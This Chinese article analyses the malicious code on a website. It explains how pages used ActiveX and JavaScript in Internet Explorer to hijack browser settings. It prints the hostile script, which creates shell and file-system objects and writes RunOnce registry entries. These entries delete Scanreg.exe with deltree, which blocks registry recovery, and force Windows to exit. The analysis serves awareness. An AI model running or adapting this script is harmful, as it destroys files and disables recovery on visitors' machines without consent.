|
57、分析一个网站的恶意代码
最近一段时间网页恶意代码对本地注册表的修改可以说是闹得沸沸扬扬,从改IE标题开始到改首页,甚至还发展到锁定INTERNET选项和注册
表编辑器阻止用户恢复自己的IE!真是愈来愈严重了。开始改标题的时候只不过像小孩子跑到别人家的大门上用粉笔涂上“XX到此一游”,到后
来就变质成了强盗要霸占整个家园。本来也许站长的原意是希望自己站点的访问量能高一些,不过很遗憾用错了方法,上过当的网民再也不会到
他的站点去了。好了,废话少说,我们来看一下这究竟是怎么回事。
其实这些都是利用了ACTIVE和JS做到的,我们来看这段危险代码。如果浏览了这个网页的话IE跟系统都会被修改得不象样,仅仅可以使用
WINDOWS的基本程序。够狠的了。
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL; Shor.Save();}
//end add favorites or links function
function f(){ try { //ActiveX initialization (这里初始化ACTIVEX,为修改浏览者的注册表做准备。)
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{ //set home page Shl.RegWrite
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe","start.exe /
m deltree /y c:\\windows\\Command\\Scanreg.exe /q /u
/autorun");(注意这里,Scanreg.exe被删除!这样就阻挠了浏览者通过恢复浏览之前的注册表来修复系统!想想这意味着什么?它既然可以不
经过同意而删除机器中的文件,那么也可以做别的事情。包括:在没有通知的情况下格式化硬盘!)
从这里开始把IE的标题,首页,搜索页等等改得一塌糊涂,亲眼见到的话你一定忍不住想问:这是天天陪着我到处闲逛的IE吗?:)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows");
上一篇:深入剖析恶意攻击性网页-注册表全攻略
下一篇:网页攻击教学-注册表全攻略
|
精品推荐